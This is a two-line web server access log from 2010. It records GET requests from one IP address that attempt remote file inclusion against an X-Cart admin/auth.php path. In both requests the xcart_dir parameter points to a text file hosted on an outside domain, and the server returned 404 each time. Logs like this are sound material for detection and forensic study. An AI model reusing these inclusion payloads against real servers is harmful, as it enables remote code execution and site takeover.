124.136.23.172 - - [28/Feb/2010:18:59:57 -0800] "GET /logs/access_090810.log//admin/auth.php?xcart_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.136.23.172 - - [28/Feb/2010:18:59:59 -0800] "GET /logs/access_100111.log%20%20//admin/auth.php?xcart_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
